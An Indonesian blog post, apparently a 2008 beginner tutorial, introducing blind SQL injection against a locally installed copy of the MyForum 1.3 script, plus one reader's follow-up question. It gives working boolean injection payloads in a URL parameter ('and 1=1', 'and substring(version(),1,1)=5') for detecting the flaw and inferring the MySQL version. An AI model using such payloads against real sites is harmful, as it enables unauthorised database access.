2008-12-06

Blind SQL Injection Part I

Blind SQL Injection Part I

Post under di 12/06/2008 Diposkan oleh Anderson
nah nah ...

Blind SQL Injection merupakan ... cari di google gih -_-

Kenapa disebut Blind ??
Karena jenis serangan ini hanya utk membandingkan nilai dari ke dua value.
Yang tentu saja nilai true & false.
Dan yang tentu saja itu menurut saya :D

Contoh :
and 1=1 <----- bernilai true
and 1=0 <----- bernilai false

Start ... !!!

Biar bs langsung dipraktekan saya sarankan utk download aplikasi di bawah ini:
MyForum 1.3 - http://www.easy-script.com/scripts-dl/myforumv1.3.zip
Install dan mari kita coba ...

lanjut ...

http://localhost/myforum/lecture.php?id=1 and 1=1

nah liad aja tu web na normal² ajah, bandingkan dgn yg ini ...

http://localhost/myforum/lecture.php?id=1 and 1=0

beda kan ?? nah kalo beda ada kemungkinan bs di injek ... coba deh ... yuk maree ... pertama-tama kita cek dulu versi berapa MySQL nya ...

http://localhost/myforum/lecture.php?id=1 and substring(version(),1,1)=4
http://localhost/myforum/lecture.php?id=1 and substring(version(),1,1)=5

Yang hasil nya "true" berarti itulah versi MySQL nya ... Penjelasan na gini ...

substring(teks,x,y)

substring digunakan untuk mengambil string dari teks mulai dari x sampai y.
nah ... penerapan dalam MySQL bisa dilihat di bawah ini:

mysql> select version();
+---------------------------------+
| version() |
+---------------------------------+
| 5.2.3-falcon-alpha-community-nt |
+---------------------------------+
1 row in set (0.00 sec)

mysql> select substring(version(),1,1);
+--------------------------+
| substring(version(),1,1) |
+--------------------------+
| 5 |
+--------------------------+
1 row in set (0.00 sec)

mysql> select substring(version(),1,10);
+---------------------------+
| substring(version(),1,10) |
+---------------------------+
| 5.2.3-falc |
+---------------------------+
1 row in set (0.00 sec)

nah lo ... pasti udah pada ngerti nie :D
lanjut lagi ... :)

and substring(version(),1,1)=4

membandingkan value dari substring(version(),1,1) dan 4
apabila hasil nya sama maka akan bernilai "true" :)
kalo gak sama yaks "false" wekekekkeke ...

Nah sekian dulu ^^ sampe jumpa ... mwa mwa ... muachhhhhhh !!! :D
Digg Google Bookmarks reddit Mixx StumbleUpon Technorati Yahoo! Buzz DesignFloat Delicious BlinkList Furl

1 komentar: on "Blind SQL Injection Part I"

3xtr3m3b0y mengatakan...

Perbedaan mendasar antara SQLi dan Blind SQLi adalah bahwa pada Blind SQLi pesan yg dkeluarkan oleh MySQL Server tidak dimunculkan, sehingga jalan satu2x adalah membandingkan nilai yg kita masukkan dgn yg ada di database, jika sama maka hasilnya TRUE. Pertanyaanx, Apakah yg menyebabkan Blind SQLi ini ada? Gimana sampe pesan MySQL itu tdk dimunculkan?

Mhn pencerahanx master...

Salam,

3xtr3m3b0y

27 April 2010 11:06

Poskan Komentar

Langganan: Poskan Komentar (Atom)